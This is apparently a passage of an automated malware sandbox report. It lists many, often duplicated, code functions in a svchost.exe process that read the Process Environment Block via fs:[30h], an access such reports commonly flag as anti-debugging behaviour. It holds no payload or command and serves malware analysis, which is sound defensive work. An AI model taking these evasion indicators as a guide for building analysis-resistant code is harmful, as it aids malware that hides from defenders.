Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h] 2_2_02F2826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h] 2_2_02F2A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h] 2_2_02F36259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h] 2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h] 2_2_02F2823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h] 2_2_02F663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 2_2_02FEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h] 2_2_02FB63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300625D mov eax, dword ptr fs:[00000030h] 2_2_0300625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h] 2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h] 2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h] 2_2_02FD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h] 2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h] 2_2_02FD8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h] 2_2_030062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h] 2_2_02F2C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h] 2_2_02F50310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h] 2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h] 2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h] 2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h] 2_2_02F2C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h] 2_2_02F720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_02F2A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h] 2_2_02F380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h] 2_2_02FB60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h] 2_2_02FB20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h] 2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h] 2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h] 2_2_02F280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h] 2_2_02FC80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004164 mov eax, dword ptr fs:[00000030h] 2_2_03004164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03004164 mov eax, dword ptr fs:[00000030h] 2_2_03004164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h] 2_2_02F3208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h] 2_2_02F5C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h] 2_2_02F32050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h] 2_2_02FB6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h] 2_2_02FC6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h] 2_2_02F2A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h] 2_2_02F2C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h] 2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h] 2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h] 2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h] 2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h] 2_2_030061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h] 2_2_02FB4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h] 2_2_02F601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h] 2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h] 2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h] 2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h] 2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h] 2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h] 2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h] 2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h] 2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h] 2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h] 2_2_02F70185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h] 2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h] 2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h] 2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h] 2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h] 2_2_02F2C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h] 2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h] 2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h] 2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h] 2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h] 2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h] 2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h] 2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h] 2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h] 2_2_02F60124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h] 2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h] 2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h] 2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h] 2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h] 2_2_02FF0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h] 2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h] 2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h] 2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h] 2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h] 2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h] 2_2_02F666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h] 2_2_02F6C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h] 2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h] 2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h] 2_2_02F62674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h] 2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h] 2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h] 2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h] 2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h] 2_2_02F4C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h] 2_2_02F4E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h] 2_2_02F66620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h] 2_2_02F68620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h] 2_2_02F3262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h] 2_2_02F72619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h] 2_2_02FAE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h] 2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h] 2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h] 2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h] 2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h] 2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h] 2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h] 2_2_02FBE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h] 2_2_02FB07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h] 2_2_02F307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h] 2_2_02FE47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h] 2_2_02FD678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h] 2_2_02F38770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h] 2_2_02F40770
